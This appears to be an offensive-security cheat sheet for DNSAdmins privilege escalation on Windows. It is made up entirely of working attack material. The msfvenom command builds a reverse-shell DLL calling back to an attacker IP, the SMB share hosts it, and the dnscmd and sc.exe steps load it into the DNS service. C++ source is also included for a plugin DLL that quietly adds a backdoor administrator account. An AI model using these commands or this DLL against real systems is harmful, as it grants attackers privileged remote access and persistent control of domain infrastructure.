DNSAdmins

$ x86_64-w64-mingw32-gcc -shared -o evil.dll evildll.cpp

# Generating the DLL
sudo msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.28 LPORT=5566 -f dll > privesc.dll

# Host the DLL on a SMB server or upload it on the target machine
$ sudo smbserver.py MYSHARE /path/to/dll -smb2support

# On the target machine, update the DNS configuration and give it the DLL
PS > dnscmd 10.10.10.169 /config /serverlevelplugindll \\10.10.14.28\TESTLOL\privesc.dll

# You can check if the DLL has been correctly loaded
PS > Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

# Then restart the DNS service (start your listener on attacking machine before)
PS > sc.exe stop dns
PS > sc.exe query dns
PS > sc.exe start dns

#include <windows.h>
#include <stdlib.h>


// Here so I remember how to compile it.
// x86_64-w64-mingw32-gcc -shared -o evil.dll evildll.cpp

extern "C" __declspec(dllexport) int DnsPluginInitialize(PVOID a1, PVOID a2)
{
  system("net.exe user bob Password123 /add");
  system("net.exe localgroup administrators bob /add");
  return 0;
}

extern "C" __declspec(dllexport) int DnsPluginCleanup()
{
  return 0;
}

extern "C" __declspec(dllexport) int DnsPluginQuery(PSTR a1, WORD a2, PSTR a3, PVOID a4)
{
  return 0;
}


BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        OutputDebugString("DLL_PROCESS_ATTACH");
        break;

    case DLL_THREAD_ATTACH:
        OutputDebugString("DLL_THREAD_ATTACH");
        break;

    case DLL_THREAD_DETACH:
        OutputDebugString("DLL_THREAD_DETACH");
        break;

    case DLL_PROCESS_DETACH:
        OutputDebugString("DLL_PROCESS_DETACH");
        break;
    }

    return TRUE;
}